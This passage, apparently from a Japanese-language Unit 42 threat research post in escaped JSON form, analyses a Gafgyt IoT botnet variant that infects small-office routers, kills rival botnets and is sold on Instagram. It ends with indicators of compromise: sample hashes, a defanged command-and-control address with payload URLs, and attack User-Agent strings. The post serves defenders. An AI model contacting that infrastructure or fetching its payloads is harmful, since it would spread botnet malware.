e0\u3092\u30db\u30b9\u30c6\u30a3\u30f3\u30b0\u3057\u3066\u3044\u308b\u30b5\u30fc\u30d0\u30fc\u3082\u6a19\u7684\u306b\u3057\u3066\u3044\u307e\u3059\u3002<\/p>\n<h4>SNS\u304c\u30de\u30eb\u30a6\u30a7\u30a2\u306e\u30de\u30fc\u30b1\u30c3\u30c8\u30d7\u30ec\u30a4\u30b9\u306b<\/h4>\n<p>\u3053\u306e\u30b5\u30f3\u30d7\u30eb\u3067\u898b\u3064\u304b\u3063\u305f\u653b\u6483\u306e1\u3064\u306b\u3001\u540c\u4e00\u30c7\u30d0\u30a4\u30b9\u306b\u5b58\u5728\u3059\u308b\u7af6\u5408\u30dc\u30c3\u30c8\u30cd\u30c3\u30c8\u3092\u63a2\u3057\u3066kill\u3057\u3088\u3046\u3068\u3059\u308b\u3082\u306e\u304c\u3042\u308a\u307e\u3059\u3002\u3053\u308c\u306b\u3088\u308a\u3001Gafgyt\u3092\u611f\u67d3\u30c7\u30d0\u30a4\u30b9\u304c\u53c2\u52a0\u3059\u308b\u552f\u4e00\u306e\u30dc\u30c3\u30c8\u30cd\u30c3\u30c8\u306b\u3057\u3088\u3046\
u3068\u3057\u3066\u3044\u307e\u3059\u3002\u3053\u306e\u305f\u3081\u306bGafgyt\u306f\u4ed6\u306eIoT\u30dc\u30c3\u30c8\u30cd\u30c3\u30c8\u4e9c\u7a2e\u306b\u5b58\u5728\u3059\u308b\u7279\u5b9a\u306e\u30ad\u30fc\u30ef\u30fc\u30c9\u3084\u30d0\u30a4\u30ca\u30ea\u540d\u3092\u63a2\u3057\u307e\u3059\u3002\u3053\u308c\u3089\u306e\u30ad\u30fc\u30ef\u30fc\u30c9\u3068\u30d0\u30a4\u30ca\u30ea\u306f<strong><em>bin_names<\/em><\/strong>\u3001<strong><em>bin_strings<\/em><\/strong>\u3068\u3044\u30462\u3064\u306e\u7d44\u306b\u5206\u3051\u3089\u308c\u3066\u3044\u307e\u3059\u3002<\/p>\n<figure id=\"attachment_100647\" aria-describedby=\"caption-attachment-100647\" style=\"width: 514px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-10.-Binary-names-and-substrings-present-in-other-IoT-botnets.png\" rel=\"wpdevart_lightbox\"><img  class=\"wp-image-100647 size-full lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-10.-Binary-names-and-substrings-present-in-other-IoT-botnets.png\" alt=\"\u56f310 \u4ed6\u306eIoT\u30dc\u30c3\u30c8\u30cd\u30c3\u30c8\u306b\u5b58\u5728\u3059\u308b\u30d0\u30a4\u30ca\u30ea\u540d\u3084\u90e8\u5206\u6587\u5b57\u5217\" width=\"514\" height=\"640\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-10.-Binary-names-and-substrings-present-in-other-IoT-botnets.png 514w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-10.-Binary-names-and-substrings-present-in-other-IoT-botnets-241x300.png 241w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-10.-Binary-names-and-substrings-present-in-other-IoT-botnets-370x461.png 370w\" sizes=\"(max-width: 514px) 100vw, 514px\" \/><\/a><figcaption id=\"caption-attachment-100647\" class=\"wp-caption-text\">\u56f310 
\u4ed6\u306eIoT\u30dc\u30c3\u30c8\u30cd\u30c3\u30c8\u306b\u5b58\u5728\u3059\u308b\u30d0\u30a4\u30ca\u30ea\u540d\u3084\u90e8\u5206\u6587\u5b57\u5217<\/figcaption><\/figure>\n<p>\u8b58\u5225\u3067\u304d\u305f\u306a\u304b\u3067\u8208\u5473\u6df1\u304b\u3063\u305f\u6587\u5b57\u5217\u304c<span style=\"font-family: 'courier new', courier, monospace;\"><em>chinese family<\/em><\/span>\u3067\u3059\u3002\u3053\u306e\u6587\u5b57\u5217\u306f\u3001Gafgyt\u30de\u30eb\u30a6\u30a7\u30a2\u306e\u524d\u8eab\u3068\u306a\u3063\u305f<em>JenX<\/em>\u306b\u95a2\u9023\u3057\u3066\u3044\u307e\u3059\u3002JenX\u306f\u3001Grand Theft Auto: San Andreas\u3068\u3044\u3046\u30b2\u30fc\u30e0\u306e\u30db\u30b9\u30c6\u30a3\u30f3\u30b0\u30b5\u30fc\u30d0\u30fc\u3092\u6a19\u7684\u306b\u3059\u308bSan Calvicie\u3068\u3044\u3046\u30cf\u30c3\u30ab\u30fc\u30b0\u30eb\u30fc\u30d7\u304c\u62e1\u6563\u3057\u3066\u3044\u305f\u30dc\u30c3\u30c8\u30cd\u30c3\u30c8\u3067\u3059\u304c\u3001\u3053\u306e<em>JenX<\/em>\u304c<\/p>\n<p style=\"padding-left: 40px;\"><span style=\"font-family: 'courier new', courier, monospace;\"><em>gosh that <strong>chinese family<\/strong> at the other table sure ate a 
lot.<\/em><\/span><\/p>\n<p>\u3068\u3044\u3046\u6587\u5b57\u5217\u3092\u51fa\u529b\u3059\u308b\u306e\u3067\u3059\u3002<\/p>\n<p>\u3053\u308c\u3089\u6587\u5b57\u5217\u306e\u591a\u304f\u306f\u3001Hakai\u3001Miori\u3001Satori\u3001\u60aa\u540d\u9ad8\u3044Mirai\u306a\u3069\u3001\u4ed6\u306eIoT\u30dc\u30c3\u30c8\u30cd\u30c3\u30c8\u306b\u95a2\u9023\u3057\u305f\u3082\u306e\u3067\u3057\u305f\u3002\u3053\u306e\u307b\u304b\u306b\u306f\u3001Instagram\u3067\u306e\u30e6\u30fc\u30b6\u30fc\u540d\u306b\u5bfe\u5fdc\u3059\u308b\u30dc\u30c3\u30c8\u30cd\u30c3\u30c8\u306e\u30d3\u30eb\u30c9\u306b\u95a2\u9023\u3059\u308b\u6587\u5b57\u5217\u3082\u898b\u3089\u308c\u307e\u3057\u305f\u3002<\/p>\n<p>\u8abf\u67fb\u30c1\u30fc\u30e0\u304c\u507d\u306e\u30d7\u30ed\u30d5\u30a3\u30fc\u30eb\u3067\u4f5c\u3063\u305f\u30a2\u30ab\u30a6\u30f3\u30c8\u3067\u3053\u308c\u3089Instagram\u30e6\u30fc\u30b6\u30fc\u306b\u9023\u7d61\u3057\u305f\u7d50\u679c\u3001\u5f7c\u3089\u304cInstagram\u306e\u30a2\u30ab\u30a6\u30f3\u30c8\u3092\u4f7f\u3063\u3066\u5b89\u4fa1\u306b\u30dc\u30c3\u30c8\u30cd\u30c3\u30c8\u3092\u8ca9\u58f2\u3057\u3066\u3044\u308b\u3053\u3068\u304c\u308f\u304b\u308a\u307e\u3057\u305f\u3002\u5f7c\u3089\u306f\u79c1\u305f\u3061\u306b\u300c8\u30c9\u30eb\u304b\u3089150\u30c9\u30eb\u3067\u30b5\u30fc\u30d0\u30fc\u4e0a\u306e\u300e\u30b9\u30dd\u30c3\u30c8\u300f\u3092\u63d0\u4f9b\u3067\u304d\u308b\u300d\u3068\u3044\u3046\u8a71\u3092\u6301\u3061\u304b\u3051\u3066\u304d\u307e\u3057\u305f\u3002\u3053\u306e\u300c\u30b9\u30dd\u30c3\u30c8\u300d\u3068\u3044\u3046\u306e\u306f\u300c\u5bfe\u4fa1\u3092\u6255\u3048\u3070\u3001\u7a3c\u50cd\u4e2d\u306e\u30dc\u30c3\u30c8\u30cd\u30c3\u30c8\u3067DoS\u653b\u6483\u3092\u304b\u3051\u308bIP\u30a2\u30c9\u30ec\u30b9\u306e\u5bfe\u8c61\u306b\u3001\u4efb\u610f\u306eIP\u30a2\u30c9\u30ec\u30b9\u306e\u30bb\u30c3\u30c8\u3092\u8ffd\u52a0\u3057\u3066\u3082\u3089\u3048\u308b\u300d\u3068\u3044\u3046\u3053\u3068\u3092\u610f\u5473\u3057\u3066\u3044\u307e\u3059\u3002\u4ed6\u306b\u3082\u5f7c\u3089\u306f
\u300c\u4e88\u7b97\u3068\u30cb\u30fc\u30ba\u6b21\u7b2c\u3067\u3001\u3055\u307e\u3056\u307e\u306a\u4fa1\u683c\u3067\u30dc\u30c3\u30c8\u30cd\u30c3\u30c8\u306e\u30bd\u30fc\u30b9\u30b3\u30fc\u30c9\u3092\u63d0\u4f9b\u3067\u304d\u308b\u300d\u3068\u3044\u3046\u8a71\u3082\u6301\u3061\u304b\u3051\u3066\u304d\u307e\u3057\u305f\u3002<\/p>\n<p>\u203b Unit 42\u306fInstagram\u30c1\u30fc\u30e0\u306b\u3053\u308c\u3089\u60aa\u610f\u306e\u3042\u308b\u30e6\u30fc\u30b6\u30fc\u30a2\u30ab\u30a6\u30f3\u30c8\u306b\u3064\u3044\u3066\u5831\u544a\u6e08\u307f\u3067\u3059\u3002\u30dc\u30c3\u30c8\u30cd\u30c3\u30c8\u306e\u30b5\u30d6\u30b9\u30af\u30ea\u30d7\u30b7\u30e7\u30f3\u7ba1\u7406\u7528\u306b\u4f7f\u7528\u3055\u308c\u3066\u3044\u308b\u60aa\u610f\u306e\u3042\u308bWeb\u30b5\u30a4\u30c8\u306b\u3064\u3044\u3066\u3082\u5831\u544a\u6e08\u307f\u3067\u3059\u3002<\/p>\n<figure id=\"attachment_100649\" aria-describedby=\"caption-attachment-100649\" style=\"width: 600px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/unit42-preview.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-11.-Instagram-accounts-selling-botnets.png\" rel=\"wpdevart_lightbox\"><img  class=\"wp-image-100650 lozad\"  data-src=\"https:\/\/unit42-preview.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-11.-Instagram-accounts-selling-botnets.png\" alt=\"\u56f311 \u30dc\u30c3\u30c8\u30cd\u30c3\u30c8\u3092\u8ca9\u58f2\u3057\u3066\u3044\u308bInstagram\u30a2\u30ab\u30a6\u30f3\u30c8\" width=\"600\" height=\"408\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-11.-Instagram-accounts-selling-botnets.png 705w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-11.-Instagram-accounts-selling-botnets-300x204.png 300w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-11.-Instagram-accounts-selling-botnets-370x251.png 370w\" sizes=\"(max-width: 600px) 100vw, 600px\" \/><\/a><figcaption 
id=\"caption-attachment-100649\" class=\"wp-caption-text\">\u56f311 \u30dc\u30c3\u30c8\u30cd\u30c3\u30c8\u3092\u8ca9\u58f2\u3057\u3066\u3044\u308bInstagram\u30a2\u30ab\u30a6\u30f3\u30c8<\/figcaption><\/figure>\n<figure id=\"attachment_100651\" aria-describedby=\"caption-attachment-100651\" style=\"width: 600px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/unit42-preview.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-12.-Instagram-account-selling-botnets-against-Fortnite.png\" rel=\"wpdevart_lightbox\"><img  class=\"wp-image-100652 lozad\"  data-src=\"https:\/\/unit42-preview.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-12.-Instagram-account-selling-botnets-against-Fortnite.png\" alt=\"\u56f312 Fortnite\u3078\u306e\u653b\u6483\u30dc\u30c3\u30c8\u30cd\u30c3\u30c8\u3092\u8ca9\u58f2\u3059\u308bInstagram\u30a2\u30ab\u30a6\u30f3\u30c8\" width=\"600\" height=\"700\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-12.-Instagram-account-selling-botnets-against-Fortnite.png 694w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-12.-Instagram-account-selling-botnets-against-Fortnite-257x300.png 257w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-12.-Instagram-account-selling-botnets-against-Fortnite-370x432.png 370w\" sizes=\"(max-width: 600px) 100vw, 600px\" \/><\/a><figcaption id=\"caption-attachment-100651\" class=\"wp-caption-text\">\u56f312 Fortnite\u3078\u306e\u653b\u6483\u30dc\u30c3\u30c8\u30cd\u30c3\u30c8\u3092\u8ca9\u58f2\u3059\u308bInstagram\u30a2\u30ab\u30a6\u30f3\u30c8<\/figcaption><\/figure>\n<figure id=\"attachment_100654\" aria-describedby=\"caption-attachment-100654\" style=\"width: 600px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/unit42-preview.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-13.-Instagram-story-of-a-malicious-user.png\" rel=\"wpdevart_lightbox\"><img  
class=\"wp-image-100655 lozad\"  data-src=\"https:\/\/unit42-preview.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-13.-Instagram-story-of-a-malicious-user.png\" alt=\"\u56f313 \u60aa\u610f\u306e\u3042\u308bInstragram\u30e6\u30fc\u30b6\u30fc\u306e\u30b9\u30c8\u30fc\u30ea\u30fc\" width=\"600\" height=\"1095\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-13.-Instagram-story-of-a-malicious-user.png 626w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-13.-Instagram-story-of-a-malicious-user-164x300.png 164w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-13.-Instagram-story-of-a-malicious-user-561x1024.png 561w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-13.-Instagram-story-of-a-malicious-user-370x675.png 370w\" sizes=\"(max-width: 600px) 100vw, 600px\" \/><\/a><figcaption id=\"caption-attachment-100654\" class=\"wp-caption-text\">\u56f313 \u60aa\u610f\u306e\u3042\u308bInstragram\u30e6\u30fc\u30b6\u30fc\u306e\u30b9\u30c8\u30fc\u30ea\u30fc<\/figcaption><\/figure>\n<p>\u4e00\u90e8\u306e\u30e6\u30fc\u30b6\u30fc\u306f\u3001\u30dc\u30c3\u30c8\u30cd\u30c3\u30c8\u306e\u30b5\u30d6\u30b9\u30af\u30ea\u30d7\u30b7\u30e7\u30f3\u7ba1\u7406\u306e\u305f\u3081\u306b\u72ec\u81ea\u306eWeb\u30b5\u30a4\u30c8\u3092\u6301\u3063\u3066\u3044\u307e\u3059\u3002<\/p>\n<figure id=\"attachment_100656\" aria-describedby=\"caption-attachment-100656\" style=\"width: 1024px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/unit42-preview.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-14.-Login-to-the-website-1024x354.png\" rel=\"wpdevart_lightbox\"><img  class=\"wp-image-100656 size-large lozad\"  data-src=\"https:\/\/unit42-preview.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-14.-Login-to-the-website-1024x354.png\" alt=\"\u56f314 
\u30a6\u30a7\u30d6\u30b5\u30a4\u30c8\u306e\u30ed\u30b0\u30a4\u30f3\u753b\u9762\" width=\"1024\" height=\"354\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-14.-Login-to-the-website-1024x354.png 1024w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-14.-Login-to-the-website-300x104.png 300w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-14.-Login-to-the-website-768x265.png 768w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-14.-Login-to-the-website-900x311.png 900w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-14.-Login-to-the-website-370x128.png 370w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><figcaption id=\"caption-attachment-100656\" class=\"wp-caption-text\">\u56f314 \u30a6\u30a7\u30d6\u30b5\u30a4\u30c8\u306e\u30ed\u30b0\u30a4\u30f3\u753b\u9762<\/figcaption><\/figure>\n<figure id=\"attachment_100658\" aria-describedby=\"caption-attachment-100658\" style=\"width: 1024px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/unit42-preview.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-15.-Dashboard-to-hire-botnets-1024x733.png\" rel=\"wpdevart_lightbox\"><img  class=\"wp-image-100658 size-large lozad\"  data-src=\"https:\/\/unit42-preview.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-15.-Dashboard-to-hire-botnets-1024x733.png\" alt=\"\u56f315 \u30dc\u30c3\u30c8\u30cd\u30c3\u30c8\u8cfc\u5165\u7528\u306e\u30c0\u30c3\u30b7\u30e5\u30dc\u30fc\u30c9\" width=\"1024\" height=\"733\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-15.-Dashboard-to-hire-botnets-1024x733.png 1024w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-15.-Dashboard-to-hire-botnets-300x215.png 300w, 
https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-15.-Dashboard-to-hire-botnets-768x550.png 768w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-15.-Dashboard-to-hire-botnets-900x644.png 900w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-15.-Dashboard-to-hire-botnets-370x265.png 370w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><figcaption id=\"caption-attachment-100658\" class=\"wp-caption-text\">Figure 15 Dashboard for purchasing botnets<\/figcaption><\/figure>\n<figure id=\"attachment_100664\" aria-describedby=\"caption-attachment-100664\" style=\"width: 1024px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/unit42-preview.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-16.-Highest-prices-called-VIP-spots-1-1024x301.png\" rel=\"wpdevart_lightbox\"><img  class=\"wp-image-100664 size-large lozad\"  data-src=\"https:\/\/unit42-preview.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-16.-Highest-prices-called-VIP-spots-1-1024x301.png\" alt=\"Figure 16 The highest prices, called VIP spots\" width=\"1024\" height=\"301\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-16.-Highest-prices-called-VIP-spots-1-1024x301.png 1024w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-16.-Highest-prices-called-VIP-spots-1-300x88.png 300w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-16.-Highest-prices-called-VIP-spots-1-768x226.png 768w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-16.-Highest-prices-called-VIP-spots-1-900x264.png 900w, 
https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-16.-Highest-prices-called-VIP-spots-1-370x109.png 370w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-16.-Highest-prices-called-VIP-spots-1.png 1518w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><figcaption id=\"caption-attachment-100664\" class=\"wp-caption-text\">Figure 16 The most expensive service, called VIP spots<\/figcaption><\/figure>\n<h2>Conclusion<\/h2>\n<p>Gafgyt, the new botnet our research team discovered, is derived from a JenX variant. It uses exploits for known vulnerabilities in IoT devices (including some more than five years old) to make compromised IoT devices part of a large botnet that attacks game servers. The main motives for these attacks are sabotage and revenge.<\/p>\n<p>Because wireless LAN routers are widely used in every industry, they are especially likely to be targeted by such attacks.<\/p>\n<p>To protect our customers' environments, we continually hunt for new malware of this kind. The types of hosts targeted by IoT botnets are broader than before, and game servers are among the hosts most likely to be targeted.<\/p>\n<p>Likewise, marketplaces for malware used to be mostly underground venues such as the dark web and underground forums, but sales now take place on social networks. Malware samples and DoS attack code are easy for anyone to obtain, and a large-scale attack can be launched for a few dollars without much technical skill.<\/p>\n<p>In short, the growing number of IoT botnets sold on Instagram, their falling cost, the availability of RCE (remote code execution) exploits, and the ubiquity of wireless LAN routers across all industries combine to make the risk of IoT devices being absorbed into botnets higher than ever.<\/p>\n<p>These factors underline the need for every industry to be mindful of IoT security and to take measures that prevent compromise of network devices and maintain business continuity.<\/p>\n<h2>IOC<\/h2>\n<h4><strong>Predecessor JenX sample:<\/strong><\/h4>\n<ul>\n<li><strong>MD5: <\/strong><span style=\"font-family: 'courier new', courier, monospace;\">fb93601f8d4e0228276edff1c6fe635d<\/span><\/li>\n<li><strong>SHA256: <\/strong><span style=\"font-family: 'courier new', courier, monospace;\">04463cd1a961f7cd1b77fe6c9e9f5e18b34633f303949a0bb07282dedcd8e9dc<\/span><\/li>\n<\/ul>\n<h4><strong>Updated JenX sample:<\/strong><\/h4>\n<ul>\n<li><strong>MD5:<\/strong> <span style=\"font-family: 'courier new', courier, monospace;\">f1c099d65bf94e009f5e65238caac468<\/span><\/li>\n<li><strong>SHA256:<\/strong> <span style=\"font-family: 'courier new', courier, monospace;\">676813ee73d382c08765a75204be8bab6bea730ff0073de10765091a8decdf07<\/span><\/li>\n<\/ul>\n<h4><strong>Infrastructure:<\/strong><\/h4>\n<ul>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">185.172.110[.]224:993<\/span><\/li>\n<\/ul>\n<h4><strong>URL:<\/strong><\/h4>\n<ul>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">185.172.110[.]224\/arm7<\/span><\/li>\n<li><span 
style=\"font-family: 'courier new', courier, monospace;\">185.172.110[.]224\/mips<\/span><\/li>\n<\/ul>\n<h4><strong>\u3053\u306e\u30b5\u30f3\u30d7\u30eb\u3067HTTP\u653b\u6483\u306b\u4f7f\u308f\u308c\u3066\u3044\u305fUser-Agent:<\/strong><\/h4>\n<ul>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">Mozilla\/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko\/20100101 Firefox\/13.0.1<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">Mozilla\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\/536.5 (KHTML, like Gecko)<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">Chrome\/19.0.1084.56 Safari\/536.5<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">Mozilla\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\/536.11 (KHTML, like Gecko)<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">Chrome\/20.0.1132.47 Safari\/536.11<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit\/534.57.2 (KHTML,<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">like Gecko) Version\/5.1.7 Safari\/534.57.2<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">Mozilla\/5.0 (Windows NT 5.1; rv:13.0) Gecko\/20100101 Firefox\/13.0.1<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit\/536.11 (KHTML,<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">like Gecko) Chrome\/20.0.1132.47 Safari\/536.11<\/span><\/li>\n<\/ul>\n<p>\u4e0a\u8a18User-Agent\u306b\u52a0\u3048\u3001Gafgyt\u30dc\u30c3\u30c8\u30cd\u30c3\u30c8\u306e\u4e9c\u7a2e\u306f\u30b9\u30ad\u30e3\u30ca\u30e2\u30b8\u30e5\u30fc\u30eb\u5185\u3067<span style=\"font-family: 'courier new', courier, monospace;\"><em>User-Agent: Hello-World<\/em><\/span>\u3068<span 
style=\"font-family: 'courier new', courier, monospace;\"><em>User-Agent: Ankit<\/em><\/span>\u3092\u4f7f\u3063\u3066\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u306e\u30ea\u30af\u30a8\u30b9\u30c8\u3092\u9001\u4fe1\u3057\u307e\u3059\u3002<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Unit 42 researchers discovered an updated Gafgy variant that looks to infect home and small office WiFi routers of known commercial brands, like Zyxel, Huawei, and Realtek to attack gaming servers.  More than 32,000 WiFi routers are potentially vulnerable to these exploits around the world. <\/p>\n","protected":false},"author":328,"featured_media":134326,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"inline_featured_image":false,"footnotes":""},"categories":[4469,4434,4428,4470],"tags":[4689,5769,6031,4679,6536],"product_categories":[4346,4442,4443,4444,4448,4456],"coauthors":[1487],"class_list":["post-100731","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-vulnerabilities","category-cybercrime-ja","category-threat-research-ja","category-vulnerabilities-ja","tag-botnet-ja","tag-ddos-ja","tag-exploit-kit-ja","tag-iot-ja","tag-wifi-routers","product_categories-advanced-threat-prevention","product_categories-advanced-threat-prevention-ja","product_categories-advanced-url-filtering-ja","product_categories-advanced-wildfire-ja","product_categories-cortex-xdr-ja","product_categories-next-generation-firewall-ja"],"yoast_head":"<!-- This site is optimized with the Yoast SEO Premium plugin v27.0 (Yoast SEO v27.0) - https:\/\/yoast.com\/product\/yoast-seo-premium-wordpress\/ -->\n<title>Gafgyt: \u5c0f\u898f\u6a21\u30aa\u30d5\u30a3\u30b9\/\u30db\u30fc\u30e0\u7121\u7ddaLAN\u30eb\u30fc\u30bf\u30fc\u306b\u611f\u67d3\u3057\u30b2\u30fc\u30e0\u30b5\u30fc\u30d0\u30fc\u3092\u653b\u6483\u3059\u308b\u30dc\u30c3\u30c8\u30cd\u30c3\u30c8<\/title>\n<meta name=\"description\" content=\"Unit 
42 discovered a new Gafgyt variant that infects IoT devices. The variant infects small office\/home wireless LAN routers from well-known manufacturers such as Zyxel, Huawei and Realtek, and competes with another botnet, JenX. Both gain access through remote code execution exploits, add the routers to a botnet, and attack game servers (servers running Valve's Source Engine), causing denial of service.\" \/>\n<link rel=\"canonical\" href=\"https:\/\/unit42.paloaltonetworks.com\/ja\/home-small-office-wireless-routers-exploited-to-attack-gaming-servers\/\" \/>\n<meta property=\"og:site_name\" content=\"Unit 42\" \/>\n<meta property=\"article:published_time\" content=\"2019-11-06T05:19:46+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2019-11-06T05:27:23+00:00\" \/>\n<meta name=\"author\" content=\"Asher Davila\" \/>\n<!-- \/ Yoast SEO Premium plugin.
-->","yoast_head_json":{"canonical":"https:\/\/unit42.paloaltonetworks.com\/ja\/home-small-office-wireless-routers-exploited-to-attack-gaming-servers\/","og_site_name":"Unit 42","article_published_time":"2019-11-06T05:19:46+00:00","article_modified_time":"2019-11-06T05:27:23+00:00","author":"Asher Davila","schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","author":{"name":"Asher Davila"},"datePublished":"2019-11-06T05:19:46+00:00","dateModified":"2019-11-06T05:27:23+00:00","keywords":["botnet","DDoS","exploit kit","IoT","WiFi routers"]},{"@type":"Person","name":"Asher Davila","description":"Senior staff researcher, Palo Alto Networks"}]}}}